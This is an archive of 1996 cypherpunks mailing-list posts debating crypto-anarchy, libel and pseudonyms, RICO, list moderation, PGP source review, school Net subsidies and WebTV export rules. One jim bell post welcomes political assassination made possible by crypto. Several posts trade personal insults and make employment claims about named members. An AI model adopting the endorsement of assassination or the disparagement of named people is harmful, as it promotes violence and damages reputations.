From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 7 Nov 1996 18:38:44 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b0baea80ee121af@[192.0.2.1]>
Message-ID: <Pine.LNX.3.94.961108023719.811A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, Peter Hendrickson wrote:

> > If I understand the reasoning, people beleive it is easier to prevent the
> > release of strong crypto. techiniques than to remove them once they are
> > released.
> 
> The reasons underlying this are what I don't completely understand.
> 
> > Once a terrorist has strong crypto, why should they stop using it if it
> > becomes illegal?
> 
> Use of strong crypto would be a tip off that one is a terrorist.
> 
> If strong cryptography were unpopular and highly illegal, very few
> people would be using it.  This makes it easy to identify suspects.
> 
> Peter Hendrickson
> ph@netcom.com
> 

If crypto is made a criminal offense, only criminals will use crypto.

 --Deviant
I have discovered that all human evil comes from this, man's being
unable to sit still in a room.
		-- Blaise Pascal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Nov 1996 00:02:50 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Law and Libel - Or why I use a nym.
In-Reply-To: <199611072010.MAA11330@netcom6.netcom.com>
Message-ID: <Pine.SUN.3.94.961108023127.17279F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, Vladimir Z. Nuri wrote:

> TCM
> >(By the way, I include my ideological usual-ally Black Unicorn on this
> >point. I'm chagrinned that he so quickly and on so many issues has made
> >statements about filing lawsuits--for defamation, for "false advertising"
> >(!!!!), and so on. Not only is this counter to the views many of us hold--I
> >think I sense the zeitgeist of the list--but it is supremely ineffective,
> >as none of these threatened lawsuits ever seem to materialize, thankfully.
> >Using the threat of a lawsuit as a rhetorical debating strategy is not
> >effective.)
> 
> heh, I find Unicorn's zeal to sue anyone for anything quite comical
> and suggestive of a high degree of immaturity.

How ever you may find it, it is the method of choice in the United States
for resolving disputes.  As for my zeal to sue, whom have I sued?  I've
entered into a settlement for a copyright dispute with one list member,
who has since found other outlets for spouting non-sensical rants..

I find that people who are being unreasonable often stop when they realize
a cost might be attached.  It quickly ends the reign of the spoiled brat 
when daddy might have to hire an attorney.  If am I to be demonized for
using the system, so be it.  Until it is changed I too live in the real
world.  As for debating strategy, it has been long clear that no debating
strategy, effective or not, will have any impact on the typical, and
increasingly common, cypherpunks "Loon."

I dislike the legal system in the United States.  If it can, however, be
used to deter loons from spouting absolute nonsense where no other method
has been effective (I believe that both the recent crypto snake oil and
totally contentless rants of a specific poster are a good example) then so
be it.

> but as to your point, the recent Forbes article on Bidzos makes it
> clear that weilding a legal sword alone can be used quite
> shrewdly, strategically, and effectively. 
> the article is quite interesting in how it suggests
> RSA was largely built on threatening to sue people. of course this
> is slightly skewed, because RSA has done things like software
> development that the article didn't mention.

I think many people fail to realize that the right to sue is in many ways
an entitlement.  It is allocated to those who government wishes to protect
and can be wielded because it is the government's wish that a certain
class of individual be so empowered.  In many cases, liberal trash about 
corporations being the only entities who can afford good legal help
aside, it is the only recourse for the average individual.

If the threat to sue is too powerful for your taste, write your
congressman.  It is a tool, no more no less than crypto.  It may not be
the nicest thing in the world to threaten to sue someone, but I have never
threatened anyone with legal recourse who was not given an opportunity to
correct their conduct first.  I've also not threatened anyone with legal
action when no viable case existed.

> actually the lesson seems to be that if you have a software
> patent, the law can be your friend (esp. if you are a business), 
> but if you want to sue someone who calls you names, the law is not very
> accommodating. sorry, Unicorn, maybe you can lobby to fix this
> little deficiency. <g>

1> I don't do lobby work.
2> I don't believe that personal insults fall within the jursidiction of
government (nor should they).

Statements which, on the other hand, cause actual harm to the reputation
of an individual, and where said individual can substantiate that harm,
are, and in my view should be, actionable.  Take note, "Vlad" and
"Dimitri," you stray very close to this boundary.  I've noticed, despite
your bluster, that personal insults from you directed to a specific
cypherpunk have much ebbed since a legal fund began to emerge.

Look folks, you cant tell someone that the neighborhood doctor is on
herion and expect nothing to happen.

You can't tell consumers that your crypto product is absolutely secure
when it isn't and expect nothing to happen.

I submit, cypherpunks, that in this day and age of archived mailing lists
and instant key word searches, suits for defamation and slander will
become MORE important, not less.  Three years from today a prospective
customer of one of you might call up the Alta Vista page and find some
blather about you being on Lithium and decide to give his contract to Bill
instead.  Silly?  Perhaps to the list member who has the context of the
discussion from which to judge the statement.  Not necessarily to the
prospective client, who may not know any better.

Not everyone has been so prudent to protect themselves with a pseudonym
such as I have.  Unfortunate in my view.  I don't need to resort to the
legal system to protect my reputation.  This is by design.  This is as
cypherpunks would have it, or so I would hope.

Mr. May quite rightly points out that resort to the legal system is
somewhat inconsistent with the creed of cypherpunks (if such a thing
exists).  Technology should be used instead.  On this point you will get
no argument from me, I practice just this policy.  Unfortunately, last I
checked, there are perhaps 3 active nyms on the list (Does Pr0duct
Cypher even exist anymore?) and filtering is hardly as common as it should
be.  (At least, judging from the number of complaints about "Vlad" and his
ilk).

Until the rest of you adopt nyms the legal system is all you've got.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Nov 1996 00:07:58 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Pseudo-law on the list and libel
In-Reply-To: <v03007800aea7c8fe63ab@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.961108030252.17279G-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


> At 9:27 PM -0600 11/6/96, Jim Choate wrote:
> >Hi all,
> >
> >There is one important legal aspect which the operator of the Cypherpunks
> >mailing list has opened themselves up for with this action. In short they
> >have now opened themselves up for defamation and liable suites by imposing
> >an editorial policy on the contents of this list (1).

Disagree.

> >
> >This opens up the potential, for example, for Tim May to sue the operator of
> >the Cypherpunks mailing list now for posts from users (even anonymous ones)
> >which defame or otherwise liable his character, reputation, or ability to
> >pursue income in his chosen field. In short the operators of the list
> >becomes publishers and distributors of the material. It is the legal
> >difference between a bookstore and a book publisher.

There is a very distinct difference between ejecting disruptive influences
and conducting one's self as a publisher and distributer.

Though these are issues which will end up before a jury (should it ever
get that far) the fact that the list owner might have booted off a
disruptive entity after repeated warnings is hardly going to meet the
threshold to throw Mr. Gilmore into the catagory of "publisher."

> Pseudo-law on this list is really getting out of hand.

We need more lawyers.  That should replace the pseudo-law with real law.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Nov 1996 00:14:29 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: RICO - (Was: Group order for Secret Power)
In-Reply-To: <199611080145.RAA20080@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961108030919.17279J-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, jim bell wrote:

> At 04:43 PM 11/7/96 -0500, Black Unicorn wrote:
> 
> >
> >I cover RICO because it's a popular prosecution tool,
> 
> "popular"?  Well, only in a rather stilted point of view!


No, it is popular.  It is the most used federal scheme for large scale
prosecutions.  It, aside from those critical of government power to the
degree cypherpunks do, a minority by any measure, is much commended for
its flexibility and convication successes.

> > because it is 
> >the predominate vehicle for seizure and forfeiture in federal cases 
> >(of which remailer and encryption issues are likely to arouse) and 
> >because it represents a codification of the approach most courts take 
> >when dealing with seizure cases.  In a very real way, RICO represents 
> >the outer extremes of seizure cases in the United States, and is 
> >probably, given the complexity of many state laws, the simplest way 
> >to "grab" something.  It also has civil provisions which make 
> >"private prosecutors" out of you and me.
> 
> But the odd thing is, the one entity we can't seem to attack using RICO is 
> the Federal government, and probably most other governments levels.  Looked 
> at purely objectively, it should be easy to demonstrate that the Federal 
> government (and its representatives) have engaged in plenty of crime as a 
> pattern of activity, and certainly enough to rise to the level of the 
> standards of RICO. (It takes only a few instances of such crime satisfy the 
> standards of RICO.)

Incorrect.  Employees of the Federal Government can be, and have been,
prosecuted under RICO.  Many political corruption cases involve some RICO
aspects.  This should make Mr. Bell a big fan of the statute, unless he
just likes the flash of murdering officials instead.


--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Nov 1996 03:56:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611081155.DAA25589@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:25 PM 11/7/96 -0800, Peter Hendrickson wrote:
>At 5:12 PM 11/7/1996, jim bell wrote:
>> BTW, some of your confusion is probably based is the false assumptions in
>> your last sentence above.  "..wide use of strong cryptography results in
>> widely unpopular activities such as sarin attacks and political
>> assassinations."
>
>No, you're confused, but it's probably my fault.  We don't really know
>what cryptoanarchy will be like.  We all have ideas about it.  Some
>we share and some we don't.  But we won't really know until we see it
>happen.

Well, uh, with all due respect, but while it's obviously true that we won't 
know EXACTLY how it'll be, that doesn't mean that no portion of we imagine 
will come true.  This is particularly true on the big issues.   For example, 
you hypothesized that "wide use of strong cryptography resuts in widely 
unpopular activities such as sarin attacks and political activities.  I 
pointed out, almost certainly correctly, that these are wrong:

1.  To believe that use in cryptography will result in greater numbers of 
random attacks on innocent civilians.  As I pointed out, the exact opposite 
should be true:  A greater ability to target the guilty means less reason to 
kill the innocent.

2.  To believe that political assassination will be unpopular even if the 
ordinary citizen has an effective say in who's going to die.


In other words, based on my understanding these beliefs are diametrically 
opposed to the truth.  Not simply a difference in extent, we're talking a 
180-degree change.

Your response is a sheepish, "but we won't really know until we see it 
happen."   Harrumph!  

>My whole point is based on the proposition that the doomsayers are right.

Which doomsayers?  What version of "doom"?  

>I believe D. Denning has suggested that cryptoanarchy will result in
>the breakdown of our society.

I suppose that depends a lot on what a person means by the phrase, "our 
society."  Used as you (and maybe she, as well) this sounds like a 
code-word.  To a statist, "society" is basically the stratification system 
that has developed to let one group of people control another.  By that 
standard, cryptoanarchy WILL "result in the breakdown of our society."   But 
that's all for the good.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Nov 1996 01:03:41 -0800 (PST)
To: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <Pine.3.89.9611080410.A72-0100000@skypoint-gw.globelle.com>
Message-ID: <Pine.SUN.3.94.961108040157.17279K-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Nov 1996, Douglas B. Renner wrote:

> 
> > > I am curious why many people believe this is not true.
> > > 
> > > Peter Hendrickson
> > > ph@netcom.com
> 
> Because it's a technology which is closely tied to human nature.
> 
> Once unleashed, you cannot coax the genie back into the bottle no matter 
> how hard you try.

You know, I've always wondered, how did the genie get in the bottle in the
first place.  Someone must have coaxed him in there.

> 
> Doug
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Thu, 7 Nov 1996 07:12:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <32817717.4CA6@gte.net>
Message-ID: <199611071509.EAA13032@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 06 Nov 1996 21:43:51 -0800, Dale Thorn wrote:

   Sandy Sandfort wrote:
   > Dale is wrong.  All access to Cypherpunks is via toad.com which
   > sits in John Gilmore's home.  (The basement office to be exact.)

   Wrongo, Mr./Mrs. Argumentum ad Nauseam.
   My computer is in fact in MY home, and my access is SOLELY through GTE.

You only send mail to/receive mail from GTE?  How, then, are you reading
this, or sending the message to which I'm replying?

What a revelation!  It's going through toad.com!  *gasp*

   > And here John has chosen to limit said forum.  It is irrelevant
   > how many subscribers perceive the list as public.  It is private.
   > Their misperception is in no way binding on John.

   Perception is everything.  And I never made a comment about "binding"
   anything.  Therefore, there is no misunderstanding.

Yes there is.  I don't understand what you're saying.

Sandy wasn't quoting you ("binding") -- he said your (mis)perception
that the list is public doesn't affect what John can or cannot do with
his privately owned computer.

Try this at home: send email addressed to majordomo@toad.com with the
body "who cypherpunks".  When you get a reply, save it in a file.  OK,
you now have a list of who's subscribed to this list on your computer.
Is it your contention that you should not be allowed to edit or delete
this list?  If you reply in the negative, why do you think that John
Gilmore shouldn't be allowed to edit his copy of this list?

   >    Some folks just don't have a clue.  Just because they don't
   >    understand the nature of John's contribution, does not stop
   >    them from yammering.

   And the people who agree with you are the only intelligent/clueful
   people on this list?

Obviously.

Well, People can be clueful about different things, of course.  On
this particular subject I can't see how you can reconcile a belief in
private property rights with your viewpoint.  So, are you a
communitarian or an idiot? :-)

   Your contention is acknowledged and rejected.

Your rejection is acknowledged and rejected :-)  Facts are facts.
Whether you choose to accept them is irrelevant.  Try "rejecting"
gravity for a while.

   The only fact you've shown to demonstrate that it's private is that
   John can manage it "anyway he wants", and/or shut it down at will.

Yes!  The only fact necessary is that the equipment on which it's run
is private.

   Well, the owners of Denny's can shut their places down whenever
   they want to too.

Yes...another example of "private."

   Matter of fact, the whole government can resign tomorrow and tell
   you to do it yourself.

Most(?) people on this list would think they'd died and gone to heaven.

   Imagine what would happen in the L.A. metro area if the truck drivers
   who bring in food decided they didn't want to do so next week....

Are you saying they can't?  Who prevents these truck drivers from
quitting, and what happens to those who try?  What do you think would
happen?

   > > You can argue until doomsday the "privacy of home" issue,...

   > Since it is correct and unasailable, I believe I will.

Dale, apparently, doesn't think his home is private.

I think it more likely that Dale is simply being a hypocrite, though.
I'm sure he would maintain that his home is private as soon as the
homeless people under the bridge down the street decide to move in.

   > > If you really agree with the ousting, I don't understand why
   > > you're arguing so hard for the "private home" issue; would you
   > > want to see a world someday where all Internet communications
   > > are "controlled" by "private" individuals at "home"?

Would you really want to see a world where this is *not* the case?

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Heavy, adj.:
	Seduced by the chocolate side of the force.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Thu, 7 Nov 1996 22:31:26 -0800 (PST)
To: "Daniel T. Hagan" <dhagan@vt.edu>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <Pine.OSF.3.95.961107154908.14910A-100000@rottweiler.cslab.vt.edu>
Message-ID: <Pine.3.89.9611080410.A72-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain



> > I am curious why many people believe this is not true.
> > 
> > Peter Hendrickson
> > ph@netcom.com

Because it's a technology which is closely tied to human nature.

Once unleashed, you cannot coax the genie back into the bottle no matter 
how hard you try.

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Thu, 7 Nov 1996 23:21:43 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b11aea81d287cbd@[192.0.2.1]>
Message-ID: <Pine.3.89.9611080553.C72-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


[snip]
> The key here is that in these cases the practice has become widely
> accepted.  By widely accepted, I mean that very significant numbers of
> people believe that there is nothing all that wrong with the practice.
> Those who disagree do not feel it is worth the trouble to put a stop
> to it.
[snip]

While this might be the case, I don't believe it is "key".

Also, I'm not sure why you used this as a counterpoint.  Are you saying 
that there are not a significant number of people who think there is 
nothing wrong with sending truly private messages?  I would disagree 
with such an assertion based on my own converastions with crypto-ignorant 
aquaintances.  Most people either trust the gov't implicitly or haven't 
thought about it or (erroneously) consider it irrelevant - but deep down 
they definitely value their privacy.

Take the flip side for example:  Quite a few people think it "wrong" to 
receive radio signals in the 800-900 Mhz band; and laws have been passed 
regulating scanners with the intention of inhibiting this practice.  
However the practice continues to proliferate.  This genie is also out of 
the bottle, and it has the effect of creating demand for crypto.

(This is actually yet another method in which the battle for crypto can 
be fought.)

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 8 Nov 1996 03:06:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: WinKrypt
Message-ID: <1.5.4.32.19961108110427.006b006c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 "WinKrypt's marriage of highly sophisticated technology -- such
 as the advanced, not-for- export 256-bit GOST encryption
 algorithm contained in the KeyMail program -- with a
 user-friendly interface virtually redefines the PC security
 category," said Syncronys.

 http://www.syncronys.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 8 Nov 1996 04:38:27 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Validating a program
In-Reply-To: <3282BD90.43FA@gte.net>
Message-ID: <199611081235.HAA18376@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dale Thorn wrote:
| Adam Shostack wrote:
| > Dale Thorn wrote:
| > | stewarts@ix.netcom.com wrote:
| > | > >> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:
| > | > >> > Last,  I would like to know once and for all,  is PGP compromised,  is
| > | > >> > there a back door, and have we been fooled by NSA to believe it's secure?
| 
| > | > You can read and compile the source code yourself.
| 
| > | Really?  All 60,000 or so lines, including all 'includes' or attachments?
| > | I'll bet you can't find 10 out of 1,000 users who have read the total source,
| > | let alone comprehended and validated it.
| 
| [snip]
| 
| > In short, if you're paranoid, feel free to look over the source.  But the fact that
| > most people have never peeked under the hood is not a strike against pgp at all.
| 
| The quip about peeking under the hood may apply OK to an automobile, but to a program
| which encrypts?  Granted that most messages (99+ % ??), if read by NSA et al, won't
| put the sender in any great danger, but when the application is really serious, as it
| always is sooner or later, you must realize that people could be taking great risks
| with PGP encryption, and "pretty sure" isn't good enough when it's really, really
| vital to have bulletproof security.

	You're wrong.

	People can make their own choices about what level of risk
they're willing to accept.  That they make bad choices is not my
problem, except when they're paying for my opinion.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 8 Nov 1996 07:39:01 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Validating a program
In-Reply-To: <199611081235.HAA18376@homeport.org>
Message-ID: <328353D8.4D28@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> Dale Thorn wrote:
> | Adam Shostack wrote:
> | > Dale Thorn wrote:
> | > | stewarts@ix.netcom.com wrote:
> | > | > >> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:

> | The quip about peeking under the hood may apply OK to an automobile, but to a program
> | which encrypts?  Granted that most messages (99+ % ??), if read by NSA et al, won't
> | put the sender in any great danger, but when the application is really serious, as it
> | always is sooner or later, you must realize that people could be taking great risks
> | with PGP encryption, and "pretty sure" isn't good enough when it's really, really
> | vital to have bulletproof security.

>         You're wrong.
>         People can make their own choices about what level of risk
> they're willing to accept.  That they make bad choices is not my
> problem, except when they're paying for my opinion.

It's easy to say, but when the "shit comes down" as they say, the average user is
going to swear they had assurance PGP was absolutely secure, etc....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 8 Nov 1996 07:44:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Information [for new PGP user]
In-Reply-To: <Pine.OSF.3.91.961107213057.8220G-100000@fn3.freenet.tlh.fl.us>
Message-ID: <199611081542.HAA18264@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
> 
> the point is that the source code is available and public.  I may not be 
> able to find any errors or hiddens trapdoors in it, but I have greater 
> trust in it because many other people can read it and make public 
> comments about it.   the advantage of a published (public) work is that 
> even those of us who are not experts can gain the advantage of having the 
> work reviewed openly by anyone who is so inclined.

People would do well to remember this.  In the future software
released by PGP Inc. will not come with source code.  I don't believe
source to PGPfone will ever be released, for instance.  Beware of this
software.  Despite Zimmerman's strong privacy record, you should
never, ever, use crypto software that doesn't come with source.
Period.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 8 Nov 1996 05:00:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Vulis now on the "Don't Hire" list
In-Reply-To: <v03007803aea827844e20@[207.167.93.63]>
Message-ID: <62R3wD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


[Cc:'d to John "deep pockets" Gilmore, who approves of and assumes liability
for Timmy's posts on John's private mailing list. ]

"Timothy C. May" <tcmay@got.net> writes:

> And, indeed, it is not likely to be who suffers in the job market as a
> result of Dr. Vulis' rants and raves and generally insane postings; my
> situation is secure, but I understand that Vulis has joined L. Dettweiler
> on the "List of Unemployables" passed around Silicon Valley.
>
> I strongly doubt many computer companies in the Silicon Valley will be
> willing to hire him or his consulting service as his antics have received
> publicity.
>
> He may have his "NetScum" list and Web page, but it's his name on the list
> of folks not to hire.

Too bad for the Silicon Valley. :-) But I couldn't be hired by Cygnus
anyway because I'm straight.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 8 Nov 1996 07:53:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Universal Service for the Net: Why it's a bad idea
Message-ID: <Pine.GSO.3.95.961108075315.19194D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 8 Nov 1996 07:53:05 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Universal Service for the Net: Why it's a bad idea

Yesterday I spent one of the most interminably boring afternoons of my
life in a cramped and sweaty eighth-floor conference room at the FCC.
The occasion? A special panel was announcing its recommendations to
the FCC on a new universal service plan, as required by the 1996
Telecommunications Act.

The problem was that the Federal-State Joint Board hadn't reached a
decision by the time the hearing was due to begin at 1 pm. Nor had
they at 2 pm. Or an hour later. In a conference room down the hall,
the eight-person board were sweating even more than we were. They
wanted consensus. Eventually the meeting began, closer to 4 pm.

The board's unanimous recommendation: The creation of a $2.25 billion
universal service fund to subsidize schools' Net-connections. The subsidy
will range from 20 percent to 90 percent and will be tied to how many kids
get tax-subsidized school lunches at each school. The cost will be paid
for by "telecommunications carriers," meaning higher phone bills for
consumers. (Of course, the FCC's Reed Hundt tried to duck this question,
but other panel mambers clarified.) The FCC will vote on this proposal
early next year -- and since Chairman Hundt was on the panel, approval
seems almost certain.

I happen to think this is a bad idea, but saying so publicly almost
inevitably results in charges of elitism, "information have-nots," or
being indifferent to the needs of our children. Opposing the CDA also
left one open to similar charges: soft on porn, high on anarchy, or
indifferent to the needs of our children. (I'm starting to believe
that more evil can be done in the name of "protecting our children"
than with any other excuse.)

But just as there are real arguments against the CDA that don't rely
on overheated "protecting children" rhetoric, so there are real
arguments against this universal service scheme:

* With more government intervention almost inevitably comes more
  control. I can hear it now from family values activists: "My tax
  dollars are going to pay for porn on the Net!"

* Why should a Beverly Hills high school get a discount of 20 percent?
  Can't they afford to pay for ISDN?

* Ironically, the same White House that is pushing this plan to wire
  schools to the Net is also pushing Bruce Lehman's "NII copyright bill"
  that will shut the door on schools' ability to _use_ information on
  the Net. Schizophrenic kowtowing to too many special interests? You
  decide.

* The American Library Association has fought the good fight on free
  expression issues (as in the second CDA suit, ALA v. DoJ) and on the
  copyright bill. Yet in this matter, they're the ones pushing for this
  universal service scheme. Clearly, alliances shift.

* With increased taxation of telecom industries -- taxes that could
  increase constantly at the whim of the FCC -- investors will be wary
  and money will shift elsewhere. If this happens, it will damage the
  ability of firms to improve our nation's telecom infrastructure.

* Does every student have a _right_ to be online -- that should be
  paid for by tax dollars -- or is it a _privilege_ that should be paid
  for by other means?

* This implementation of universal service is based on a knee-jerk
  fear of Internet "haves and have-nots." That's unrealistic. New
  technologies takes time to filter through a society. The joint board's
  position ignores history; flush toilets and cars took decades to spread.

* Why should universal service be a priority, before books and roofs
  for our schools? Dozens of schools in the nation's capital were
  blocked from opening because of, I recall, fire code violations and
  even non-working bathrooms. If the Clinton administration _truly and
  honestly_ wants to help children, the president has to look no
  further than the District's own school system. 

Don't get me wrong. I agree with the end goal, which is to get kids
online. But I can't stomach the Clinton administration's means to
that end.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 8 Nov 1996 08:16:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: WebTV a "munition"
Message-ID: <199611081616.IAA21577@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain




Page 3 of the San Jose Mercury News has a small blurb
about WebTV's browser/set-top box that "uses
computer-security technology so powerful that the
government is classifying it as a weapon
that will require a special export license before
it can be sold overseas".

"Few industry experts expect such a licsense to
be granted, meaning the companies are unlikely to
begin selling current versions of the US-made
devices next year in Eurpoe and Japan as they
had planned".

[fluff about export laws]

"We're the guinea pig" says Steve Perlman, chairman
and CEO blah blah.


So what's the story here?  It's a web browser, so they're
probably talking about SSL.  SSL (both versions) already has mechanisims for
allowing "export" level encryption, and although you still need to
get a Commodities Jurisdiction, it's been done before so it
shouldn't be too difficult.  If they didn't use the "export"
level SSL CipherTypes, then what're they up to?  Are they
fighting crypto export laws (for which they should be congratulated
and supported) or are they just looking for free publicity?


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Fri, 8 Nov 1996 05:20:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Return address forgery [was Judge Kozinski...]
Message-ID: <199611081320.IAA35308@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Fri Nov 08 20:20:02 1996
The Bovine remailer wrote:

> On Wed, 6 Nov 1996, Bill Frantz wrote:
> 
> > At  4:39 AM 11/6/96 -0500, Jim Ray wrote:
> > >Judge Kozinski wrote:
> > >> ... Perhaps the answer
> > >> is that the post office should not accept mail unless there
> > >> is a clear indication of who the sender is 

[...]

> > In the case of postal mail, return address forgery is so easy

[...]

> Yes the failure to forsee this did stand out a little in the discourse
>  :).

Well, in the judge's defense, note that he used the word "perhaps" above. I 
like this judge, which (obviously) isn't something I can say about too many 
judges...I think he was just trying to sharpen our thoughts and arguments, 
and that he DOES agree with us on many, many things. His fears about the 
misuse of anonymity in a police state, for example, come from his personal 
experience in a former socialist paradise. I think (hope) that being exposed 
to "cypherpunk issues" by as many good thinkers as he was, in a relaxed, 
non-courtroom setting, has broadened his understanding of the many issues 
involved and will help "our" side immensely if these same issues ever do 
come before him.

I have decided, however, to cease my very enjoyable conversation with him 
about these issues, from now until after Judge Patel's Bernstein case has 
been decided and appealed, because of this very possibility. I am already 
concerned that an ambitious U.S. Attorney, using Alta Vista, could attempt 
to argue that "cypherpunk terrorists have been secretly trying to subtly 
influence Kozinski's thinking, and that therefore he should be removed from 
the case in favor of some judge who has no clue whatsoever about the 'Net, 
encryption, anonymous remailers, etc." [I am sure the argument wouldn't be 
put quite that way <g> but that's what the U.S. Attorney would mean.] There 
is now a judge with some idea of these issues who will IMNSHO probably be 
fair to "our" side. It is a rare opportunity, and I don't want to "blow it."
JMR


Please note new 2000bit PGPkey & new address <jmr@shopmiami.com>
This key will be valid through election day 2000.
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71
Please avoid using old 1024bit PGPkey E9BD6D35 anymore. Thanks.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMoPcRjUhsGSn1j2pAQHtVAfPd+F3jXHov9TgaZJSsKNcfi0dn30K9Dgs
2PQwFFLp8UuHFQGybBdorw4V9DQuGTehLVuiBttKdbBZYWVMhWv/TptZ+sagbexO
EX0TrcD8gU3dtSK9xLH94TO8YMY5U/sk/8LIC1Q4cehXiZ3MOK/yxxR7V8uooJuI
